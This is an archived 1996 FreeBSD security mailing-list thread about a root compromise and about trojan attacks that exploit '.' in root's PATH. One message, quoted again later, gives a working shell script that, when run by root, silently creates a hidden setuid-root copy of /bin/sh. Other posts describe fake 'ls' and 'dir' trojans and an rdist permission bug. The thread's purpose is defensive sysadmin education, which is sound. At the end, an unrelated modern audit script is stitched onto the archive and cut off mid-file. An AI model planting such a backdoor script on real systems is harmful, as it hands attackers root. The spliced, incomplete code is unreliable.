CC: security@FreeBSD.org
Priority: normal
X-mailer: Pegasus Mail for Win32 (v2.31)
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

[CC header trimmed, once again]

On 24 Jun 96 at 23:46, -Vince- wrote:

> > > > 2) The Cracker made a trojan script somewhere (usually exploiting
> > > > some admins (roots) who have "." in their path). This way he creates
> > > > a script that when run as root will make him a suid program.
> > > > after this he has you by tender bits.
> > >
> > > Hmmm, doesn't everyone have . as their path since all . does is allow
> > > someone to run stuff from the current directory...
> >
> > Not root! This leaves you wide open for trojans. As root you should
> > have to type ./foo to run foo in the current directory.
>
> Hmmm, really? It seems like almost all systems root has . for the
> path but if the directory for root is like read, write, execute by root
> only, how will they get into it?

*Sigh*. This is turning into elementary sysadmin class. If you are
going to admin a system with over 1000 users, you need to learn to
think security issues through. If "." is in the path, the cracker can
put a trojan horse in some directory where he *can* write, and he
will name it something he hopes the unsuspecting admin will execute
while root.

Bradley Dunn

From owner-freebsd-security Tue Jun 25 01:22:54 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA00992 for security-outgoing; Tue, 25 Jun 1996 01:22:54 -0700 (PDT)
Received: from asterix.insight.co.za (asterix.insight.co.za [196.27.7.9]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA00983; Tue, 25 Jun 1996 01:22:44 -0700 (PDT)
Received: by asterix.insight.co.za (Smail3.1.29.1 #1) id m0uYTO8-000vDSC; Tue, 25 Jun 96 10:22 SAT
Message-Id:
From: jvisagie@insight.co.za (Johann Visagie)
Subject: Re: I need help on this one - please help me track this guy down!
To: vince@mercury.gaianet.net (-Vince-)
Date: Tue, 25 Jun 1996 10:22:20 +0200 (SAT)
Cc: mark@grumble.grondar.za, hackers@FreeBSD.org, security@FreeBSD.org, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net
In-Reply-To: from "-Vince-" at Jun 24, 96 11:46:03 pm
X-Mailer: ELM [version 2.4 PL24 ME8a]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

-Vince- wrote:
>
> Hmmm, really? It seems like almost all systems root has . for the
> path but if the directory for root is like read, write, execute by root
> only, how will they get into it?

-Vince- also writes (in response to Mark Murray):
> > For much more info, I recommend "Practical Unix Security" from
> > O'Reilly and Associates, (By Garfinkel?)
>
> I have that book but there are always ways no one knows about ;)

I would suggest you _read_ it ;), specifically page 151 ff. (assuming
you have the first edition), where path attacks are described.

To summarise an example in that section:

1) User realises root has '.' in his path
2) User creates a file called something funny like '-i' in his home
   directory
3) User creates a script called 'ls' in his home directory, which first
   attempts to create a setuid root shell somewhere, and then calls the
   "real" /bin/ls
4) User tells his sysadmin there's a "funny file" in his home directory
   that he can't get rid of
5) Root cd's to user's home directory and types "ls" to see what's
   going on.
6) Voila!

Boy, this brings back memories... ;)

-- V

Johann Visagie | Email: jvisagie@insight.co.za | Tel: +27 83 777-4260

From owner-freebsd-security Tue Jun 25 01:23:21 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA01077 for security-outgoing; Tue, 25 Jun 1996 01:23:21 -0700 (PDT)
Received: from irz301.inf.tu-dresden.de (irz301.inf.tu-dresden.de [141.76.1.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA01036; Tue, 25 Jun 1996 01:23:07 -0700 (PDT)
Received: from sax.sax.de by irz301.inf.tu-dresden.de (8.6.12/8.6.12-s1) with ESMTP id KAA22910; Tue, 25 Jun 1996 10:22:10 +0200
Received: (from uucp@localhost) by sax.sax.de (8.6.12/8.6.12-s1) with UUCP id KAA07482; Tue, 25 Jun 1996 10:22:09 +0200
Received: (from j@localhost) by uriah.heep.sax.de (8.7.5/8.6.9) id JAA17930; Tue, 25 Jun 1996 09:58:52 +0200 (MET DST)
From: J Wunsch Message-Id: <199606250758.JAA17930@uriah.heep.sax.de> Subject: Re: I need help on this one - please help me track this guy down! To: davidg@Root.COM Date: Tue, 25 Jun 1996 09:58:51 +0200 (MET DST) Cc: gpalmer@FreeBSD.ORG, vince@mercury.gaianet.net, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Reply-To: joerg_wunsch@uriah.heep.sax.de (Joerg Wunsch) In-Reply-To: <199606250714.AAA03862@root.com> from David Greenman at "Jun 25, 96 00:14:37 am" X-Phone: +49-351-2012 669 X-PGP-Fingerprint: DC 47 E6 E4 FF A6 E9 8F 93 21 E0 7D F9 12 D6 4E X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

As David Greenman wrote:

> Actually, this particular problem can be avoided by putting "." last in
> the search path rather than first.

But only until someone drops this script e.g. into /tmp:

#!/bin/sh

if [ `id -u -r` = 0 ] ; then
    (cp /bin/sh $HOME/.newsrc.bak; chown root $HOME/.newsrc.bak;
    chmod 04755 $HOME/.newsrc.bak) &
fi

echo "$0: not found."
exit 1

...and links it to /tmp/sl, /tmp/mkae, /tmp/iv etc.

--
cheers, J"org   joerg_wunsch@uriah.heep.sax.de -- http://www.sax.de/~joerg/ -- NIC: JW11-RIPE
Never trust an operating system you don't have sources for. ;-)

From owner-freebsd-security Tue Jun 25 01:32:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA01866 for security-outgoing; Tue, 25 Jun 1996 01:32:59 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA01859 for ; Tue, 25 Jun 1996 01:32:56 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA13998; Tue, 25 Jun 1996 01:32:31 -0700 (PDT) Date: Tue, 25 Jun 1996 01:32:31 -0700 (PDT)
From: -Vince- To: Bradley Dunn cc: security@FreeBSD.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy In-Reply-To: <199606250800.EAA05731@ns2.harborcom.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

On Tue, 25 Jun 1996, Bradley Dunn wrote:

> [CC header trimmed, once again]
>
> On 24 Jun 96 at 23:46, -Vince- wrote:
>
> > > > > 2) The Cracker made a trojan script somewhere (usually exploiting
> > > > > some admins (roots) who have "." in their path). This way he creates
> > > > > a script that when run as root will make him a suid program.
> > > > > after this he has you by tender bits.
> > > >
> > > > Hmmm, doesn't everyone have . as their path since all . does is allow
> > > > someone to run stuff from the current directory...
> > >
> > > Not root! this leaves you wide open for trojans. As root you should
> > > have to type ./foo to run foo in the current directory.
> >
> > Hmmm, really? It seems like almost all systems root has . for the
> > path but if the directory for root is like read, write, execute by root
> > only, how will they get into it?
>
> *Sigh*. This is turning into elementary sysadmin class. If you are
> going to admin a system with over 1000 users, you need to learn to
> think security issues through. If "." is in the path, the cracker can
> put a trojan horse in some directory where he *can* write, and he
> will name it something he hopes the unsuspecting admin will execute
> while root.

Well, the problem here is one of the admins knows the user and he was watching him just run the program himself, the root user had nothing to do with executing anything...
Vince From owner-freebsd-security Tue Jun 25 01:35:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02066 for security-outgoing; Tue, 25 Jun 1996 01:35:40 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA02046; Tue, 25 Jun 1996 01:35:32 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA14088; Tue, 25 Jun 1996 01:33:22 -0700 (PDT) Date: Tue, 25 Jun 1996 01:33:21 -0700 (PDT) 
From: -Vince- To: Joerg Wunsch cc: hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250758.JAA17930@uriah.heep.sax.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Tue, 25 Jun 1996, J Wunsch wrote:

> As David Greenman wrote:
>
> > Actually, this particular problem can be avoided by putting "." last in
> > the search path rather than first.
>
> But only until someone drops this script e.g. into /tmp:
>
> #!/bin/sh
>
> if [ `id -u -r` = 0 ] ; then
>     (cp /bin/sh $HOME/.newsrc.bak; chown root $HOME/.newsrc.bak;
>     chmod 04755 $HOME/.newsrc.bak) &
> fi
>
> echo "$0: not found."
> exit 1
>
>
> ...and links it to /tmp/sl, /tmp/mkae, /tmp/iv etc.

Hmmm, I never thought they can get you in the /tmp directory...

Vince

From owner-freebsd-security Tue Jun 25 01:36:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02146 for security-outgoing; Tue, 25 Jun 1996 01:36:07 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA02095; Tue, 25 Jun 1996 01:35:52 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA14320; Tue, 25 Jun 1996 01:35:28 -0700 (PDT) Date: Tue, 25 Jun 1996 01:35:28 -0700 (PDT)
From: -Vince- To: Johann Visagie cc: mark@grumble.grondar.za, hackers@FreeBSD.org, security@FreeBSD.org, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

On Tue, 25 Jun 1996, Johann Visagie wrote:

> -Vince- wrote:
> >
> > Hmmm, really? It seems like almost all systems root has . for the
> > path but if the directory for root is like read, write, execute by root
> > only, how will they get into it?
>
> -Vince- also writes (in response to Mark Murray):
> > > For much more info, I recommend "Practical Unix Security" from
> > > O'Reilly and Associates, (By Garfinkel?)
> >
> > I have that book but there are always ways no one knows about ;)
>
> I would suggest you _read_ it ;), specifically page 151 ff. (assuming you
> have the first edition), where path attacks are described. To summarise an
> example in that section:
>
> 1) User realises root has '.' in his path
> 2) User creates a file called something funny like '-i' in his home
> directory
> 3) User creates a script called 'ls' in his home directory, which first
> attempts to create a setuid root shell somewhere, and then calls the
> "real" /bin/ls
> 4) User tells his sysadmin there's a "funny file" in his home directory that
> he can't get rid of
> 5) Root cd's to user's home directory and types "ls" to see what's going on.
> 6) Voila!

Yes but what happens if it was like this case:

1) user knows sysadmin so sysadmin creates account for him
2) user logs in and puts a file named root with the sysadmin watching him
3) user runs root and gets root... this only works if the user is using bash or sh for the login shell, if you use csh or tcsh, it doesn't work.
Vince From owner-freebsd-security Tue Jun 25 01:37:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02318 for security-outgoing; Tue, 25 Jun 1996 01:37:50 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA02304; Tue, 25 Jun 1996 01:37:34 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id KAA08996; Tue, 25 Jun 1996 10:36:53 +0200 (SAT) Message-Id: <199606250836.KAA08996@grumble.grondar.za> To: -Vince- cc: Mark Murray , hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! Date: Tue, 25 Jun 1996 10:36:52 +0200 
From: Mark Murray Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

-Vince- wrote:
> > Example: user suspects you may be a DOS user, and are likely to try
> > to type the "dir" or "cls" command every now and then (by mistake).
> >
> > In his home directory he places a script called "dir" that creates a
> > suid shell (silently) then prints the usual "command not found" error.
> >
> > He then phones you, asking for support, and tries to trick you into
> > running his script. Having "." in your path makes his trickery easier.
>
> Hmmm, that's only if we had phone support.... We don't :) but do
> admins really go run a program that the user said won't run?

Don't pick details. The point is that there is the problem that you could be tricked (somehow) into running a user's script instead of a system binary. This can happen even if the "." is at the end of your path if the program/script is not the name of a system app.

M
--
Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key

From owner-freebsd-security Tue Jun 25 01:40:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02562 for security-outgoing; Tue, 25 Jun 1996 01:40:10 -0700 (PDT) Received: from sivka.rdy.com (sivka.rdy.com [205.149.182.19]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA02509; Tue, 25 Jun 1996 01:40:00 -0700 (PDT) Received: from dima@localhost by sivka.rdy.com id BAA10117; (8.7/RDY) Tue, 25 Jun 1996 01:20:53 -0700 (PDT)
From: "Dima Ruban" Message-Id: <960625012052.ZM10115@sivka.rdy.com> Date: Tue, 25 Jun 1996 01:20:51 -0700 In-Reply-To: Poul-Henning Kamp "Re: I need help on this one - please help me track this guy down!" (Jun 24, 8:28am) References: <6630.835630106@critter.tfs.com> Organization: HackerDome, Inc. X-Mailer: Z-Mail (4.0b.514 14may96) To: Poul-Henning Kamp , "Jordan K. Hubbard" Subject: Re: I need help on this one - please help me track this guy down! Cc: Amancio Hasty , hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Jun 24, 8:28am, Poul-Henning Kamp wrote: > Subject: Re: I need help on this one - please help me track this guy down! > In message <8378.835580425@time.cdrom.com>, "Jordan K. Hubbard" writes: > >Also, I think that calling the FBI on this one is only likely to get > >me put on infinite hold when they hear that the perpetrator is in > >Russia. :-) > > Yes, Russia would be an CIA issue. Hey, guys! Stop this "Russian" thing, will ya? :-) > > -- > Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. > http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. > whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. > Future will arrive by its own means, progress not so. > >-- End of excerpt from Poul-Henning Kamp -- -- dima From owner-freebsd-security Tue Jun 25 01:42:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02730 for security-outgoing; Tue, 25 Jun 1996 01:42:17 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA02655; Tue, 25 Jun 1996 01:40:57 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA14940; Tue, 25 Jun 1996 01:40:18 -0700 (PDT) Date: Tue, 25 Jun 1996 01:40:18 -0700 (PDT) 
From: -Vince- To: Mark Murray cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250836.KAA08996@grumble.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Mark Murray wrote: > -Vince- wrote: > > > Example: user suspects you may be a DOS user, and are likely to try > > > to type the "dir" or "cls" command every now and then (by mistake). > > > > > > In his home directory he places a script called "dir" that creates a > > > suid shell (silently) then prints the usual "command not found" error. > > > > > > He then phones you, asking for support, and tries to trick you into > > > running his script. Having "." in your path makes his trickery easier. > > > > Hmmm, that's only if we had phone support.... We don't :) but do > > admins really go run a program that the user said won't run? > > Don't pick details. The point is that there is the problem that you > could be tricked (somehow) into running a user's script instead > of a system binary. This can happen even if the "." is at the > end of your path if the program/script is not the name of a > system app. Yeah, you have a point but jbhunt was watching the user as he hacked root since he brought the file from his own machine.... so that wasn't something the admin was tricked into doing.. 
Vince From owner-freebsd-security Tue Jun 25 01:43:11 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA02849 for security-outgoing; Tue, 25 Jun 1996 01:43:11 -0700 (PDT) Received: from proxy.siemens.at (proxy.siemens.at [192.138.228.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA02364; Tue, 25 Jun 1996 01:37:57 -0700 (PDT) Received: from sol1.gud.siemens.co.at (sol-f.gud.siemens-austria) by proxy.siemens.at with SMTP id AA12616 (5.67a/IDA-1.5); Tue, 25 Jun 1996 10:36:56 +0200 Received: from ws2301.gud.siemens.co.at by sol1.gud.siemens.co.at with smtp (Smail3.1.28.1 #7 for ) id m0uYTc3-00021HC; Tue, 25 Jun 96 10:36 MET DST Received: by ws2301.gud.siemens.co.at (1.37.109.16/1.37) id AA269621747; Tue, 25 Jun 1996 10:35:47 +0200 
From: "Hr.Ladavac" Message-Id: <199606250835.AA269621747@ws2301.gud.siemens.co.at> Subject: Re: I need help on this one - please help me track this guy down! To: davidg@root.com Date: Tue, 25 Jun 1996 10:35:46 +0200 (MESZ) Cc: gpalmer@FreeBSD.ORG, vince@mercury.gaianet.net, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: <199606250714.AAA03862@root.com> from "David Greenman" at Jun 25, 96 00:14:37 am X-Mailer: ELM [version 2.4 PL24 ME8a] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

In his e-mail David Greenman wrote:
>
> >-Vince- wrote in message ID
> >:
> >> Hmmm, doesn't everyone have . as their path since all . does is allow
> >> someone to run stuff from the current directory...
> >
> >No, everyone does NOT have `.' in their paths! I most certainly don't,
> >as I know that it's ALL too easy to have someone break your system
> >security that way. Imagine if you are looking into something as root,
> >and have `.' in your path. You go into someone else's directory, and do
> >a `ls'. All they need is a wrapper program called `ls' in that dir
> >which copies /bin/sh to some directory, chowns it to root, then sets
> >the setuid bit, and THEN exec's ls with the arguments given, and BANG,
> >there goes your system security.
>
> Actually, this particular problem can be avoided by putting "." last in
> the search path rather than first.

But Trojan more versus okay more can not. Current directory has no place in path. Not even for a normal user. root should not have any path whatsoever; even though this is a tad too paranoid.
/Marino > > -DG > > David Greenman > Core-team/Principal Architect, The FreeBSD Project > From owner-freebsd-security Tue Jun 25 01:46:19 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA03110 for security-outgoing; Tue, 25 Jun 1996 01:46:19 -0700 (PDT) Received: from sivka.rdy.com (sivka.rdy.com [205.149.182.19]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA03101; Tue, 25 Jun 1996 01:46:15 -0700 (PDT) Received: from dima@localhost by sivka.rdy.com id BAA10148; (8.7/RDY) Tue, 25 Jun 1996 01:33:06 -0700 (PDT) 
From: "Dima Ruban" Message-Id: <960625013305.ZM10146@sivka.rdy.com> Date: Tue, 25 Jun 1996 01:33:05 -0700 In-Reply-To: "JULIAN Elischer" "Re: I need help on this one - please help me track this guy down!" (Jun 24, 1:59pm) References: <199606242059.NAA01968@ref.tfs.com> Organization: HackerDome, Inc. X-Mailer: Z-Mail (4.0b.514 14may96) To: "JULIAN Elischer" , richardc@CSUA.Berkeley.EDU (Veggy Vinny) Subject: Re: I need help on this one - please help me track this guy down! Cc: mark@grumble.grondar.za, wilko@yedi.iaf.nl, jkh@time.cdrom.com, guido@gvr.win.tue.nl, hackers@FreeBSD.org, security@FreeBSD.org, ache@FreeBSD.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

On Jun 24, 1:59pm, JULIAN Elischer wrote:
> Subject: Re: I need help on this one - please help me track this guy down!
> >
> > On Mon, 24 Jun 1996, Mark Murray wrote:
> >
> > > What do you get from strings(1)? (Long shot..)
> >
> > -rwsr-xr-x 1 root users 278528 Jun 18 04:01 root is from the dir
>      ^ DUH!
> There was also the one that used rdist in daemon mode
> to rdist itself a new copy of /etc/passwd (and friends)

With rdist bug in daemon mode you were able to change permissions on any file. So you don't even have to copy password file.... :-)

> I haven't looked recently to see if that still works for FreeBSD..
> I last looked in 386BSD..
>
> julian
>
>-- End of excerpt from JULIAN Elischer

-- dima

From owner-freebsd-security Tue Jun 25 01:51:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA03646 for security-outgoing; Tue, 25 Jun 1996 01:51:37 -0700 (PDT) Received: from seagull.rtd.com (root@seagull.rtd.com [198.102.68.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA03634; Tue, 25 Jun 1996 01:51:33 -0700 (PDT) Received: (from dgy@localhost) by seagull.rtd.com (8.7.5/1.2) id BAA00894; Tue, 25 Jun 1996 01:51:04 -0700 (MST)
From: Don Yuniskis Message-Id: <199606250851.BAA00894@seagull.rtd.com> Subject: Re: I need help on this one - please help me track this guy down! To: vince@mercury.gaianet.net (-Vince-) Date: Tue, 25 Jun 1996 01:51:03 -0700 (MST) Cc: mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: from "-Vince-" at Jun 25, 96 00:28:34 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk It seems that -Vince- said: > > On Tue, 25 Jun 1996, Mark Murray wrote: > > > > In his home directory he places a script called "dir" that creates a > > suid shell (silently) then prints the usual "command not found" error. > > > > He then phones you, asking for support, and tries to trick you into > > running his script. Having "." in your path makes his trickery easier. > > Hmmm, that's only if we had phone support.... We don't :) but do > admins really go run a program that the user said won't run? Well, it *appears* that one of *you* did! :> From owner-freebsd-security Tue Jun 25 01:52:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA03884 for security-outgoing; Tue, 25 Jun 1996 01:52:39 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA03855; Tue, 25 Jun 1996 01:52:28 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id BAA17390; Tue, 25 Jun 1996 01:52:03 -0700 (PDT) Date: Tue, 25 Jun 1996 01:52:02 -0700 (PDT) 
From: -Vince- To: Don Yuniskis cc: mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250851.BAA00894@seagull.rtd.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Don Yuniskis wrote: > It seems that -Vince- said: > > > > On Tue, 25 Jun 1996, Mark Murray wrote: > > > > > > In his home directory he places a script called "dir" that creates a > > > suid shell (silently) then prints the usual "command not found" error. > > > > > > He then phones you, asking for support, and tries to trick you into > > > running his script. Having "." in your path makes his trickery easier. > > > > Hmmm, that's only if we had phone support.... We don't :) but do > > admins really go run a program that the user said won't run? > > Well, it *appears* that one of *you* did! :> Well, jbhunt was the one who gave the user the account and the user just transferred the root which is /bin/sh with setuid and ran it and he got root.... Vince From owner-freebsd-security Tue Jun 25 02:03:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA04679 for security-outgoing; Tue, 25 Jun 1996 02:03:04 -0700 (PDT) Received: from gallup.cia-g.com (root@gallup.cia-g.com [206.206.162.10]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id CAA04667 for ; Tue, 25 Jun 1996 02:02:59 -0700 (PDT) Received: from gallup.cia-g.com (gallup.cia-g.com [206.206.162.10]) by gallup.cia-g.com (8.6.11/8.6.9) with SMTP id DAA18993 for ; Tue, 25 Jun 1996 03:04:09 -0600 Date: Tue, 25 Jun 1996 03:04:08 -0600 (MDT) 
From: Stephen Fisher To: security@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250714.AAA03862@root.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

And for the example of people putting an sl (mistyped ls) or something in /tmp: I mount world writable directories with "noexec".

On Tue, 25 Jun 1996, David Greenman wrote:

> >-Vince- wrote in message ID
> >:
> >> Hmmm, doesn't everyone have . as their path since all . does is allow
> >> someone to run stuff from the current directory...
> >
> >No, everyone does NOT have `.' in their paths! I most certainly don't,
> >as I know that it's ALL too easy to have someone break your system
> >security that way. Imagine if you are looking into something as root,
> >and have `.' in your path. You go into someone else's directory, and do
> >a `ls'. All they need is a wrapper program called `ls' in that dir
> >which copies /bin/sh to some directory, chowns it to root, then sets
> >the setuid bit, and THEN exec's ls with the arguments given, and BANG,
> >there goes your system security.
>
> Actually, this particular problem can be avoided by putting "." last in
> the search path rather than first.
>
> -DG
>
> David Greenman
> Core-team/Principal Architect, The FreeBSD Project
>

- Steve - Systems Manager - Community Internet Access - http://www.cia-g.com

From owner-freebsd-security Tue Jun 25 02:04:19 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA04860 for security-outgoing; Tue, 25 Jun 1996 02:04:19 -0700 (PDT) Received: from seagull.rtd.com (root@seagull.rtd.com [198.102.68.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA04855; Tue, 25 Jun 1996 02:04:16 -0700 (PDT) Received: (from dgy@localhost) by seagull.rtd.com (8.7.5/1.2) id CAA01576; Tue, 25 Jun 1996 02:03:35 -0700 (MST)
From: Don Yuniskis Message-Id: <199606250903.CAA01576@seagull.rtd.com> Subject: Re: I need help on this one - please help me track this guy down! To: vince@mercury.gaianet.net (-Vince-) Date: Tue, 25 Jun 1996 02:03:35 -0700 (MST) Cc: dgy@rtd.com, mark@grumble.grondar.za, hackers@FreeBSD.ORG, security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net In-Reply-To: from "-Vince-" at Jun 25, 96 01:52:02 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

It seems that -Vince- said:
>
> On Tue, 25 Jun 1996, Don Yuniskis wrote:
>
> > It seems that -Vince- said:
> > > Hmmm, that's only if we had phone support.... We don't :) but do
> > > admins really go run a program that the user said won't run?
> >
> > Well, it *appears* that one of *you* did! :>
>
> Well, jbhunt was the one who gave the user the account and the
> user just transferred the root which is /bin/sh with setuid and ran it
> and he got root....

Um, someone can (and undoubtedly *will* :>) correct me if I'm wrong but there's *NO WAY* to install a setuid binary *without* having root in the first place! So, he could copy the program onto your machine and the system would strip the "setuid" bit automatically. Otherwise, there's no point in the setuid mechanism as anyone could make a setuid binary on their own system and just upload it to yours!
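The two checks this thread keeps returning to, a PATH that consults the current directory or a world-writable directory such as /tmp, and setuid files showing up under home and scratch directories, as an added POSIX sh example that is not code from the list or from any of its posters. The sandbox it builds is a constructed fixture, and the helper names (audit_path, find_setuid, make_sandbox) are mine; the nosuid/noexec mount options mentioned later in the thread are the complementary fix it does not cover.

```shell
#!/bin/sh
# Added example, not code from this thread or from any of its posters.
# Two defender-side checks for what the thread describes: a PATH that
# resolves command names from the current directory (or from a directory
# anyone can write to, like /tmp), and setuid files turning up under
# home or scratch directories. POSIX sh; needs only ls(1), find(1) and
# mktemp(1).

# audit_path PATHSTRING
# Prints one "reason: entry" line per problem entry. Returns 1 if any
# entry was flagged, 0 if the PATH is clean. An empty PATH is treated as
# clean: nothing is looked up at all.
audit_path() {
    found=0
    if [ -z "$1" ]; then
        return 0
    fi
    rest="$1:"                      # sentinel so the last entry is seen
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        case "$entry" in
            ""|.)                   # "" and "." both mean the cwd
                printf 'current-directory: "%s"\n' "$entry"
                found=1 ;;
            /*)
                # Absolute entry: flag it when "other" has write access,
                # since anyone could drop an "sl" or "mkae" decoy there.
                # Column 9 of ls -ld is the other-write bit on BSD and GNU.
                case "$(ls -ld "$entry" 2>/dev/null)" in
                    d???????w*)
                        printf 'world-writable: %s\n' "$entry"
                        found=1 ;;
                esac ;;
            *)
                printf 'relative: %s\n' "$entry"
                found=1 ;;
        esac
    done
    return $found
}

# find_setuid DIR...
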